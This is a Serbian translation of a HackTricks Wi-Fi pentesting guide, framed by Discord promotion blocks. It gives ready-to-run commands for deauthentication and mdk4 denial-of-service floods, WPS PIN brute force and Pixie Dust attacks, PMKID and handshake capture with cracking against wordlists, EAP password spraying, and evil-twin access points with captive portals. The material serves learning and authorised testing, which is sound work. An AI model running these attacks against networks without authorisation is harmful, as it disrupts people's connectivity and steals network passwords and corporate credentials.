hacktricks/generic-methodologies-and-resources/pentesting-wifi
2024-03-26 19:24:02 +00:00
..
evil-twin-eap-tls.md Translated to Serbian 2024-02-10 13:11:20 +00:00
README.md Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-03-26 19:24:02 +00:00

Testiranje bezbednosti Wifi mreže

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Pridružite se HackenProof Discord serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!

Uvidi u Hakovanje
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

Vesti o Hakovanju u Realnom Vremenu
Budite u toku sa dinamičnim svetom hakovanja kroz vesti i uvide u realnom vremenu

Najnovije Najave
Budite informisani o najnovijim nagradama za pronalaženje bagova i bitnim ažuriranjima platformi

Pridružite nam se na Discord-u i počnite da sarađujete sa vrhunskim hakerima danas!

Osnovne komande za Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Alati

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Pokrenite airgeddon pomoću docker-a

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Sa: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Može izvršiti Evil Twin, KARMA i Known Beacons napade, a zatim koristiti phishing šablon da bi uspeo da dobije pravi lozinku mreže ili da uhvati kredencijale društvenih mreža.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Ovaj alat automatizuje napade na WPS/WEP/WPA-PSK. Automatski će:

  • Postaviti interfejs u režim za praćenje
  • Skenirati moguće mreže - I omogućiti vam da odaberete žrtvu(e)
  • Ako je u pitanju WEP - Pokrenuti napade na WEP
  • Ako je u pitanju WPA-PSK
  • Ako je u pitanju WPS: Napad Pixie dust i napad brute-force (budite oprezni, brute-force napad može potrajati dugo). Imajte na umu da ne pokušava null PIN ili baze/pinove generisane iz baze.
  • Pokušati da uhvati PMKID sa AP-a radi pucanja
  • Pokušati da deautentifikuje klijente AP-a kako bi uhvatio handshake
  • Ako je PMKID ili Handshake, pokušati brute-force sa top5000 lozinki.

Sumarizacija Napada

  • DoS
  • Deautentifikacija/disasocijacija -- Diskonektovati sve (ili određeni ESSID/Klijent)
  • Slučajne lažne AP-ove -- Sakrij mreže, mogući pad skenera
  • Preopterećenje AP-a -- Pokušaj da se uništi AP (obično nije vrlo korisno)
  • WIDS -- Igranje sa IDS-om
  • TKIP, EAPOL -- Neki specifični napadi za DoS nekih AP-ova
  • Pucanje
  • Pucanje WEP (nekoliko alata i metoda)
  • WPA-PSK
  • WPS pin "Brute-Force"
  • WPA PMKID brute-force
  • [DoS +] WPA handshake hvatanje + Pucanje
  • WPA-MGT
  • Hvatanje korisničkog imena
  • Brute-force Kredencijala
  • Zli blizanac (sa ili bez DoS-a)
  • Otvoreni Zli blizanac [+ DoS] -- Korisno za hvatanje kredencijala za captive portal i/ili izvođenje LAN napada
  • WPA-PSK Zli blizanac -- Korisno za mrežne napade ako znate lozinku
  • WPA-MGT -- Korisno za hvatanje korporativnih kredencijala
  • KARMA, MANA, Glasan MANA, Poznati beacon
  • + Otvoreni -- Korisno za hvatanje kredencijala za captive portal i/ili izvođenje LAN napada
  • + WPA -- Korisno za hvatanje WPA handshake-ova

DOS

Paketi Deautentifikacije

Opis sa ovde:.

Napadi deautentifikacije, čest metod u hakovanju Wi-Fi-ja, uključuju falsifikovanje "upravljačkih" okvira kako bi prisilno diskonektovali uređaje sa mreže. Ovi nešifrovani paketi obmanjuju klijente da veruju da su od legitimne mreže, omogućavajući napadačima da prikupe WPA handshake-ove u svrhu pucanja ili da trajno ometaju mrežne veze. Ova taktika, alarmantna u svojoj jednostavnosti, široko se koristi i ima značajne posledice po sigurnost mreže.

Deautentifikacija korišćenjem Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 znači deautentikaciju
  • 1 je broj deautentikacija koje treba poslati (možete poslati više ako želite); 0 znači slati ih kontinuirano
  • -a 00:14:6C:7E:40:80 je MAC adresa pristupne tačke
  • -c 00:0F:B5:34:30:30 je MAC adresa klijenta za deautentikaciju; ako se izostavi, tada se šalje emitovanje deautentikacije (ne radi uvek)
  • ath0 je ime interfejsa

Paketi diskonekcije

Paketi diskonekcije, slično kao paketi deautentikacije, su vrsta upravljačkog okvira koji se koristi u Wi-Fi mrežama. Ovi paketi služe da prekinu vezu između uređaja (kao što su laptop ili pametni telefon) i pristupne tačke (AP). Glavna razlika između diskonekcije i deautentikacije leži u njihovim scenarijima korišćenja. Dok AP emituje **pakete deautentikacije da bi eksplicitno uklonio zlonamerne uređaje sa mreže, paketi diskonekcije se obično šalju kada AP prolazi kroz isključivanje, restartovanje ili premestanje, što zahteva prekid veze sa svim povezanim čvorovima.

Ovaj napad može biti izveden pomoću mdk4 (režim "d"):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Više DOS napada pomoću mdk4

Ovde ovde.

NAPADNI REŽIM b: Poplava odašiljanja

Šalje odašiljačke okvire kako bi prikazao lažne AP-ove klijentima. Ponekad ovo može izazvati pad mrežnih skenera čak i drajvera!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

NAPADNI REŽIM a: Odbijanje autentifikacije usluge

Slanje autentifikacionih okvira svim dostupnim pristupnim tačkama (AP) u dometu može preopteretiti ove AP, posebno kada je uključen veliki broj klijenata. Ovaj intenzivan saobraćaj može dovesti do nestabilnosti sistema, uzrokujući da neke AP zaledi ili čak resetuje.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

NAPADNI REŽIM p: Probing SSID-a i Bruteforcing

Probing pristupnih tačaka (AP) proverava da li je SSID pravilno otkriven i potvrđuje opseg AP-a. Ova tehnika, zajedno sa bruteforcing skrivenih SSID-ova sa ili bez liste reči, pomaže u identifikaciji i pristupanju skrivenim mrežama.

NAPADNI REŽIM m: Iskorišćavanje protivmere Michael

Slanje slučajnih ili duplikatnih paketa različitim QoS redovima može pokrenuti protivmere Michael na TKIP AP-ovima, što dovodi do jednominutnog gašenja AP-a. Ovaj metod je efikasna taktika napada DoS (Odbijanje usluge).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

NAPADNI REŽIM e: Injekcija paketa EAPOL Start i Logoff

Poplavljivanje AP-a sa EAPOL Start okvirima stvara lažne sesije, preopterećujući AP i blokirajući legitimne klijente. Alternativno, ubacivanje lažnih EAPOL Logoff poruka prisilno prekida klijente, oba metoda efikasno ometaju mrežnu uslugu.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

NAPADNI REŽIM s: Napadi na IEEE 802.11s mreže sa mrežnom mrežom

Različiti napadi na upravljanje vezama i rutiranje u mrežama sa mrežnom mrežom.

NAPADNI REŽIM w: Konfuzija WIDS-a

Povezivanje klijenata sa više WDS čvorova ili lažnih rogue AP-ova može manipulisati sistemima za otkrivanje i prevenciju upada, stvarajući konfuziju i potencijalno zloupotrebu sistema.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

NAPADNI REŽIM f: Paket Fuzzer

Paket fuzzer koji ima različite izvore paketa i sveobuhvatan set modifikatora za manipulaciju paketima.

Airggedon

Airgeddon nudi većinu napada predloženih u prethodnim komentarima:

WPS

WPS (Wi-Fi Protected Setup) pojednostavljuje proces povezivanja uređaja s ruterom, poboljšavajući brzinu postavljanja i jednostavnost za mreže koje su enkriptovane sa WPA ili WPA2 Personal. Nije efikasan za lako kompromitovanu WEP sigurnost. WPS koristi 8-znamenkasti PIN, validiran u dva dela, što ga čini podložnim napadima brute-force zbog ograničenog broja kombinacija (11.000 mogućnosti).

WPS Brute Force

Postoje 2 glavna alata za izvođenje ove akcije: Reaver i Bully.

  • Reaver je dizajniran da bude snažan i praktičan napad protiv WPS-a, i testiran je protiv različitih pristupnih tačaka i implementacija WPS-a.
  • Bully je nova implementacija napada brute force na WPS, napisana u C-u. Ima nekoliko prednosti u odnosu na originalni reaver kod: manje zavisnosti, poboljšanu memoriju i CPU performanse, ispravno rukovanje endijanom i robustan set opcija.

Napad iskorišćava ranjivost WPS PIN-a, posebno izlaganje prvih četiri cifre i ulogu poslednje cifre kao kontrolne znamenke, olakšavajući brute-force napad. Međutim, odbrane od brute-force napada, poput blokiranja MAC adresa agresivnih napadača, zahtevaju rotaciju MAC adresa kako bi se nastavio napad.

Nakon što napadač dobije WPS PIN pomoću alata poput Bully ili Reaver, može zaključiti WPA/WPA2 PSK, obezbeđujući postojan pristup mreži.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Pametni Brute Force

Ovaj unapređeni pristup cilja WPS PIN-ove koristeći poznate ranjivosti:

  1. Prethodno otkriveni PIN-ovi: Iskoristite bazu podataka poznatih PIN-ova povezanih sa određenim proizvođačima koji koriste uniformne WPS PIN-ove. Ova baza podataka povezuje prva tri okteta MAC adresa sa verovatnim PIN-ovima za ove proizvođače.
  2. Algoritmi generisanja PIN-ova: Iskoristite algoritme poput ComputePIN i EasyBox, koji izračunavaju WPS PIN-ove na osnovu MAC adrese AP-a. Arcadyan algoritam dodatno zahteva ID uređaja, dodajući sloj procesu generisanja PIN-ova.

Napad WPS Pixie Dust

Dominique Bongard je otkrio propust u nekim pristupnim tačkama (AP) koji se odnosi na kreiranje tajnih kodova, poznatih kao nonce-ovi (E-S1 i E-S2). Ako se ovi nonce-ovi mogu otkriti, pucanje WPS PIN-a AP-a postaje lako. AP otkriva PIN unutar posebnog koda (hash) kako bi dokazao da je legitimno i da nije lažna (rogue) AP. Ovi nonce-ovi su suštinski "ključevi" za otključavanje "sefa" koji drži WPS PIN. Više informacija o ovome može se pronaći ovde.

U jednostavnim terminima, problem je u tome što neke AP nisu koristile dovoljno slučajne ključeve za šifrovanje PIN-a tokom procesa povezivanja. To čini PIN ranjivim na nagađanje spoljašnjeg mrežnog saobraćaja (napad Brute Force van mreže).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ako ne želite da prebacite uređaj u monitor režim, ili reaver i bully imaju neki problem, možete probati OneShot-C. Ovaj alat može izvesti Pixie Dust napad bez potrebe za prebacivanjem u monitor režim.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Napad nultim pinom

Neke loše dizajnirane sisteme čak i dozvoljavaju Nulti PIN (prazan ili nepostojeći PIN) da omogući pristup, što je prilično neuobičajeno. Alat Reaver je sposoban da testira ovu ranjivost, za razliku od Bully-a.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Svi predloženi napadi WPS-a mogu se lako izvesti koristeći airgeddon.

  • 5 i 6 vam omogućavaju da probate vaš prilagođeni PIN (ako ga imate)
  • 7 i 8 izvode Pixie Dust napad
  • 13 vam omogućava da testirate NULL PIN
  • 11 i 12 će prikupiti PIN-ove povezane sa odabranim AP-om iz dostupnih baza podataka i generisati moguće PIN-ove koristeći: ComputePIN, EasyBox i opciono Arcadyan (preporučeno, zašto ne?)
  • 9 i 10 će testirati svaki mogući PIN

WEP

Tako slomljen i nekorišćen danas. Samo znajte da airgeddon ima opciju WEP nazvanu "All-in-One" za napad na ovu vrstu zaštite. Više alata nudi slične opcije.


Pridružite se HackenProof Discord serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!

Hacking Insights
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

Real-Time Hack News
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu

Latest Announcements
Budite informisani o najnovijim nagradama za pronalaženje bagova i važnim ažuriranjima platformi

Pridružite nam se na Discord-u i počnite da sarađujete sa vrhunskim hakerima danas!


WPA/WPA2 PSK

PMKID

Godine 2018, hashcat je otkrio novu metodu napada, jedinstvenu jer zahteva samo jedan jedini paket i ne zahteva da bilo koji klijent bude povezan sa ciljnim AP-om - samo interakciju između napadača i AP-a.

Mnogi moderni ruteri dodaju opciono polje u prvi EAPOL okvir tokom asocijacije, poznato kao Robust Security Network. To uključuje PMKID.

Kako originalna objava objašnjava, PMKID se kreira koristeći poznate podatke:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

S obzirom da je "PMK ime" konstantno, znamo BSSID pristupne tačke i stanice, a PMK je identičan onome iz potpune 4-way rukovanja, hashcat može koristiti ove informacije da probije PSK i povrati lozinku!

Da prikupite ove informacije i bruteforce lokalno lozinku, možete uraditi:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Zaustavljeni PMKID-ovi će biti prikazani u konzoli i takođe sačuvani unutar _ /tmp/attack.pcap_
Sada, konvertujte snimak u hashcat/john format i probajte ga:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Molimo vas da obratite pažnju da ispravan format heša sadrži 4 dela, poput: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Ako vaš heš sadrži samo 3 dela, onda je nevažeći (PMKID snimak nije bio važeći).

Imajte na umu da hcxdumptool takođe snima rukovanja (nešto poput ovoga će se pojaviti: MP:M1M2 RC:63258 EAPOLTIME:17091). Možete pretvoriti rukovanja u format hashcat/john koristeći cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Obavestio sam da neki rukopisi uhvaćeni ovim alatom ne mogu biti probijeni čak i kada se zna tačna lozinka. Preporučio bih da se rukopisi uhvate i na tradicionalan način ako je moguće, ili da se uhvati nekoliko njih koristeći ovaj alat.

Snimanje rukopisa

Napad na WPA/WPA2 mreže može se izvršiti snimanjem rukopisa i pokušajem probijanja lozinke offline. Ovaj proces uključuje praćenje komunikacije određene mreže i BSSID na određenom kanalu. Evo pojednostavljenog vodiča:

  1. Identifikujte BSSID, kanal i povezanog klijenta ciljne mreže.
  2. Koristite airodump-ng da biste pratili saobraćaj mreže na određenom kanalu i BSSID-u, u nadi da ćete uhvatiti rukopis. Komanda će izgledati ovako:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. Da biste povećali šansu za hvatanje handshake-a, privremeno isključite klijenta sa mreže kako biste ga prisilili na ponovnu autentifikaciju. To se može uraditi korišćenjem aireplay-ng komande, koja šalje pakete deautentifikacije ka klijentu:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Napomena da je klijent deautentifikovan, može pokušati da se poveže sa drugim AP-om ili, u drugim slučajevima, sa drugom mrežom.

Kada se pojave informacije o handshake-u u airodump-ng, to znači da je handshake uhvaćen i možete prestati sa slušanjem:

Kada je handshake uhvaćen, možete ga provaliti pomoću aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Provera da li je handshake u fajlu

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ako ovaj alat pronađe nedovršen handshake ESSID pre završenog, neće otkriti validan.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

U WiFi postavkama za preduzeća, susrešćeš se sa različitim metodama autentifikacije, koje pružaju različite nivoe sigurnosti i funkcionalnosti upravljanja. Kada koristiš alatke poput airodump-ng za inspekciju mrežnog saobraćaja, možeš primetiti identifikatore za ove tipove autentifikacije. Neki uobičajeni metodi uključuju:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • Ova metoda podržava hardverske tokene i jednokratne lozinke unutar EAP-PEAP. Za razliku od MSCHAPv2, ne koristi peer izazov i šalje lozinke u plaintext formatu pristupnoj tački, što predstavlja rizik od napada na smanjenje sigurnosti.
  1. EAP-MD5 (Message Digest 5):
  • Uključuje slanje MD5 heša lozinke sa klijenta. Nije preporučljivo zbog ranjivosti na rečničke napade, nedostatka autentifikacije servera i nemogućnosti generisanja sesijski specifičnih WEP ključeva.
  1. EAP-TLS (Transport Layer Security):
  • Koristi i klijentske i serverske sertifikate za autentifikaciju i može dinamički generisati korisničke i sesijske WEP ključeve za obezbeđivanje komunikacije.
  1. EAP-TTLS (Tunneled Transport Layer Security):
  • Pruža međusobnu autentifikaciju putem enkriptovanog tunela, zajedno sa metodom za izvođenje dinamičkih, po-korisniku, po-sesijskih WEP ključeva. Zahteva samo serverske sertifikate, dok klijenti koriste akreditive.
  1. PEAP (Protected Extensible Authentication Protocol):
  • Funkcioniše slično kao EAP stvaranjem TLS tunela za zaštićenu komunikaciju. Omogućava korišćenje slabijih autentifikacionih protokola iznad EAP zbog zaštite koju pruža tunel.
  • PEAP-MSCHAPv2: Često nazvan PEAP, kombinuje ranjivi MSCHAPv2 mehanizam izazova/odgovora sa zaštitnim TLS tunelom.
  • PEAP-EAP-TLS (ili PEAP-TLS): Slično kao EAP-TLS, ali inicira TLS tunel pre razmene sertifikata, nudeći dodatni sloj sigurnosti.

Više informacija o ovim autentifikacionim metodama možete pronaći ovde i ovde.

Snimanje Korisničkog Imena

Čitajući https://tools.ietf.org/html/rfc3748#page-27 izgleda da ako koristite EAP, "Identitet" poruke moraju biti podržane, i korisničko ime će biti poslato čisto u "Odgovoru na Identitet" porukama.

Čak i koristeći jedan od najsigurnijih metoda autentifikacije: PEAP-EAP-TLS, moguće je snimiti korisničko ime poslato u EAP protokolu. Da biste to uradili, snimite autentifikacionu komunikaciju (pokrenite airodump-ng unutar kanala i wireshark na istom interfejsu) i filtrirajte pakete po eapol.
Unutar paketa "Odgovor, Identitet", pojaviće se korisničko ime klijenta.

Anonimni Identiteti

Skrivanje identiteta podržano je i od strane EAP-PEAP i EAP-TTLS. U kontekstu WiFi mreže, zahtev za EAP-Identitetom obično pokreće pristupna tačka (AP) tokom procesa asocijacije. Da bi se osigurala zaštita anonimnosti korisnika, odgovor od EAP klijenta na uređaju korisnika sadrži samo osnovne informacije potrebne za početni RADIUS server da obradi zahtev. Ovaj koncept je ilustrovan kroz sledeće scenarije:

  • EAP-Identitet = anonimno
  • U ovom scenariju, svi korisnici koriste pseudonim "anonimno" kao svoj identifikator korisnika. Početni RADIUS server funkcioniše kao EAP-PEAP ili EAP-TTLS server, odgovoran za upravljanje serverskom stranom PEAP ili TTLS protokola. Unutrašnji (zaštićeni) autentifikacioni metod se zatim ili obrađuje lokalno ili se delegira na udaljeni (matični) RADIUS server.
  • EAP-Identitet = anonimno@realm_x
  • U ovoj situaciji, korisnici iz različitih oblasti skrivaju svoje identitete dok pokazuju svoje odgovarajuće oblasti. Ovo omogućava početnom RADIUS serveru da prosledi EAP-PEAP ili EAP-TTLS zahteve RADIUS serverima u njihovim matičnim oblastima, koji deluju kao PEAP ili TTLS server. Početni RADIUS server funkcioniše isključivo kao čvor releja RADIUS-a.

  • Alternativno, početni RADIUS server može funkcionisati kao EAP-PEAP ili EAP-TTLS server i ili obrađivati zaštićeni autentifikacioni metod ili ga prosleđivati drugom serveru. Ova opcija olakšava konfigurisanje različitih politika za različite oblasti.

U EAP-PEAP, kada se TLS tunel uspostavi između PEAP servera i PEAP klijenta, PEAP server pokreće zahtev za EAP-Identitetom i prenosi ga kroz TLS tunel. Klijent odgovara na ovaj drugi zahtev za EAP-Identitetom slanjem odgovora na EAP-Identitet koji sadrži pravi identitet korisnika kroz enkriptovani tunel. Ovaj pristup efikasno sprečava otkrivanje stvarnog identiteta korisnika bilo kome ko prisluškuje 802.11 saobraćaj.

EAP-TTLS prati nešto drugačiju proceduru. Sa EAP-TTLS, klijent obično autentifikuje koristeći PAP ili CHAP, obezbeđeno TLS tunelom. U ovom slučaju, klijent uključuje atribut Korisničko Ime i ili Lozinku ili CHAP-Lozinku u početnu TLS poruku poslatu nakon uspostavljanja tunela.

Bez obzira na izabrani protokol, PEAP/TTLS server dobija informaciju o pravom identitetu korisnika nakon što je TLS tunel uspostavljen. Pravi identitet može biti predstavljen kao korisnik@oblast ili jednostavno korisnik. Ako je PEAP/TTLS server takođe odgovoran za autentifikaciju korisnika, sada poseduje identitet korisnika i nastavlja sa autentifikacionim metodom zaštićenim TLS tunelom. Alternativno, PEAP/TTLS server može proslediti novi RADIUS zahtev RADIUS serveru korisnika. Ovaj novi RADIUS zahtev izostavlja PEAP ili TTLS sloj protokola. U slučajevima kada je zaštićeni autentifikacioni metod EAP, unutrašnje EAP poruke se prenose ka matičnom RADIUS serveru bez EAP-PEAP ili EAP-TTLS omotača. Atribut Korisničko Ime izlazne RADIUS poruke sadrži pravi identitet korisnika, zamenjujući anonimni Korisničko Ime iz dolaznog RADIUS zahteva. Kada je zaštićeni autentifikacioni metod PAP ili CHAP (podržan samo od strane TTLS), atributi Korisničko Ime i ostali atributi autentifikacije izdvojeni iz TLS payload-a se zamenjuju u izlaznoj RADIUS poruci, zamenjujući anonimni Korisničko Ime i TTLS EAP-Poruka atribute pronađene u dolaznom RADIUS zahtevu.

Za više informacija pogledajte https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (password spray)

Ako se očekuje da klijent koristi korisničko ime i lozinku (primetite da EAP-TLS neće biti validan u ovom slučaju), tada možete pokušati da dobijete listu korisničkih imena (vidi sledeći deo) i lozinki i pokušati bruteforce pristup koristeći air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Možete izvršiti ovaj napad koristeći eaphammer:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Teorija napada na klijente

Selekcija mreže i roaming

  • Protokol 802.11 definiše kako stanica pristupa Proširenom servisnom setu (ESS) ali ne specificira kriterijume za izbor ESS-a ili pristupne tačke (AP) unutar njega.
  • Stanice mogu da se kreću između AP-ova koji dele isti ESSID, održavajući povezanost širom zgrade ili područja.
  • Protokol zahteva autentifikaciju stanice na ESS ali ne nalaže AP autentifikaciju stanici.

Liste preferiranih mreža (PNL)

  • Stanice čuvaju ESSID svake bežične mreže kojoj se povežu u svojoj Listi preferiranih mreža (PNL), zajedno sa detaljima konfiguracije specifičnim za mrežu.
  • PNL se koristi za automatsko povezivanje sa poznatim mrežama, poboljšavajući korisničko iskustvo optimizacijom procesa povezivanja.

Pasivno skeniranje

  • AP-ovi periodično emituju okvir balzama, najavljujući svoje prisustvo i karakteristike, uključujući ESSID AP-a osim ako je emitovanje onemogućeno.
  • Tokom pasivnog skeniranja, stanice slušaju okvire balzama. Ako ESSID balzama odgovara unosu u PNL stanice, stanica može automatski da se poveže sa tim AP-om.
  • Poznavanje PNL uređaja omogućava potencijalno iskorišćavanje imitiranjem poznatog ESSID-a mreže, prevareći uređaj da se poveže sa lažnom AP-om.

Aktivno sondiranje

  • Aktivno sondiranje uključuje slanje zahteva za sondiranje od strane stanica radi otkrivanja obližnjih AP-ova i njihovih karakteristika.
  • Usmereni zahtevi za sondiranje ciljaju određeni ESSID, pomažući u otkrivanju da li je određena mreža u dometu, čak i ako je skrivena mreža.
  • Emitovani zahtevi za sondiranje imaju polje SSID nula i šalju se svim obližnjim AP-ovima, omogućavajući stanici da proveri bilo koju preferiranu mrežu bez otkrivanja sadržaja svoje PNL.

Jednostavna AP sa preusmeravanjem na Internet

Pre nego što objasnimo kako izvesti složenije napade, biće objašnjeno kako jednostavno kreirati AP i preusmeriti njegov saobraćaj na interfejs povezan sa Internetom.

Koristeći ifconfig -a proverite da li su wlan interfejs za kreiranje AP-a i interfejs povezan sa Internetom prisutni.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Kreirajte konfiguracioni fajl /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Zatim postavite IP adrese i rute:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Zatim pokrenite dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Napravite konfiguracioni fajl hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Zaustavite dosadne procese, postavite monitor mod, i pokrenite hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Prosleđivanje i Preusmeravanje

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Zli blizanac

Napad zlog blizanca iskorišćava način na koji WiFi klijenti prepoznaju mreže, uglavnom se oslanjajući na ime mreže (ESSID) bez potrebe da se bazna stanica (pristupna tačka) autentifikuje klijentu. Ključne tačke uključuju:

  • Teškoća u diferencijaciji: Uređaji se bore da razlikuju legitimne i lažne pristupne tačke kada dele isti ESSID i tip enkripcije. Mreže u stvarnom svetu često koriste više pristupnih tačaka sa istim ESSID-om kako bi proširile pokrivenost bez prekida.

  • Roaming klijenata i manipulacija konekcijom: Protokol 802.11 omogućava uređajima da se kreću između pristupnih tačaka unutar istog ESSID-a. Napadači to mogu iskoristiti tako što će privući uređaj da se odjavi sa trenutne bazne stanice i poveže sa lažnom. To se može postići nudeći jači signal ili ometanjem konekcije sa legitimnom pristupnom tačkom kroz metode poput paketa deautentifikacije ili ometanja.

  • Izazovi u izvršenju: Uspješno izvođenje napada zlog blizanca u okruženjima sa više dobro postavljenih pristupnih tačaka može biti izazovno. Deautentifikacija jedne legitimne pristupne tačke često rezultira uređajem koji se povezuje sa drugom legitimnom pristupnom tačkom, osim ako napadač ne može deautentifikovati sve obližnje pristupne tačke ili strategijski postaviti lažnu pristupnu tačku.

Možete kreirati vrlo osnovni Open Evil Twin (bez mogućnosti rutiranja saobraćaja ka Internetu) koristeći:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Takođe možete kreirati Zli blizanac koristeći eaphammer (primetite da za kreiranje zlih blizanaca sa eaphammer-om interfejs NE TREBA DA BUDE u monitor režimu):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Ili koristeći Airgeddon: Opcije: 5,6,7,8,9 (unutar menija napada Evil Twin).

